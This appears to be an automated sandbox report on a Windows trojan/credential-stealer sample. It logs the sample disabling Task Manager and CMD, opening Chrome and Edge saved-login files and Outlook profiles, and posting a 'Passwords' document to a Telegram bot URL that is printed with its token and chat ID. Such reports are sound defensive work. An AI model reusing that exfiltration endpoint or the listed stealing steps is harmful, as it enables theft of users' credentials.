            Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026ED000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeAPI call chain: ExitProcess graph end nodegraph_0-4590
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_6F941B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F941B5F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeQueries volume information: C:\Users\user\Desktop\WGi85dsMNp.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR
            Source: Yara matchFile source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR
            Source: Yara matchFile source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            1
            Query Registry
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory21
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            WGi85dsMNp.exe76%VirustotalBrowse
            WGi85dsMNp.exe61%ReversingLabsWin32.Trojan.Guloader
            WGi85dsMNp.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.78
            truefalse
              high
              drive.usercontent.google.com
              172.217.16.193
              truefalse
                high
                reallyfreegeoip.org
                104.21.16.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comWGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsWGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002698000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.orgWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.orgWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.usercontent.google.com/WGi85dsMNp.exe, 00000002.00000003.2263229811.0000000002707000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.000000000271F000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002706000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D34000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://apis.google.comWGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.comWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nsis.sf.net/NSIS_ErrorErrorWGi85dsMNp.exefalse
                                                        high
                                                        http://api.telegram.orgWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://reallyfreegeoip.org/xml/WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              142.250.186.78
                                                              drive.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              149.154.167.220
                                                              api.telegram.orgUnited Kingdom
                                                              62041TELEGRAMRUfalse
                                                              104.21.16.1
                                                              reallyfreegeoip.orgUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              193.122.130.0
                                                              checkip.dyndns.comUnited States
                                                              31898ORACLE-BMC-31898USfalse
                                                              172.217.16.193
                                                              drive.usercontent.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1588318
                                                              Start date and time:2025-01-11 00:03:05 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 7m 51s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Run name:Run with higher sleep bypass
                                                              Number of analysed new started processes analysed:5
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:WGi85dsMNp.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 150
                                                              • Number of non-executed functions: 117
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              No simulations
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              149.154.167.220cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                    z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                      vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  104.21.16.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.kkpmoneysocial.top/86am/
                                                                                  JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                  193.122.130.0wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  checkip.dyndns.comwymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 132.226.8.169
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 132.226.247.73
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  reallyfreegeoip.orgwymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.96.1
                                                                                  H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.112.1
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.32.1
                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.80.1
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 104.21.112.1
                                                                                  Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.96.1
                                                                                  6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.32.1
                                                                                  PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.64.1
                                                                                  api.telegram.orgcOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  TELEGRAMRUcOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  CLOUDFLARENETUSwymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.96.1
                                                                                  H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.112.1
                                                                                  Gz2FxKx2cM.exeGet hashmaliciousFormBookBrowse
                                                                                  • 104.21.36.62
                                                                                  cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                  • 104.16.184.241
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.32.1
                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.80.1
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.12.205
                                                                                  ORACLE-BMC-31898USwymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 158.101.44.242
                                                                                  C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 158.101.44.242
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  54328bd36c14bd82ddaa0c04b25ed9adwymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.16.1
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.16.1
                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.16.1
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 104.21.16.1
                                                                                  Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 104.21.16.1
                                                                                  PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 104.21.16.1
                                                                                  3b5074b1b5d032e5620f69f9f700ff0e4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  37f463bf4616ecd445d4a1937da06e19TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  WtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
                                                                                  4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 142.250.186.78
                                                                                  • 172.217.16.193
